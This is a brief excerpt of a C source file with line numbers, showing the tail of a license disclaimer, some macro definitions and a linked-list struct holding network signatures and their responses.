WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 31 | */ 32 | 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | 39 | #define MAXTAGLEN 512 40 | #define SIGFORWARD 0 41 | #define SIGREVERSE 1 42 | #define DEFAULTIP "\xb7\xb7\xb7\xb7" 43 | #define ISLESSER(a, b) ((a) > (b) ? (b) : (a)) 44 | 45 | 46 | //typedef struct sigentry { 47 | struct sigentry { 48 | uint8_t *netsig; 49 | int netsiglen; 50 | uint8_t *response; 51 | int responselen; 52 | char *name; 53 | int direction; 54 | struct sigentry *next; 55 | }; 56 | --------------------------------------------------------------------------------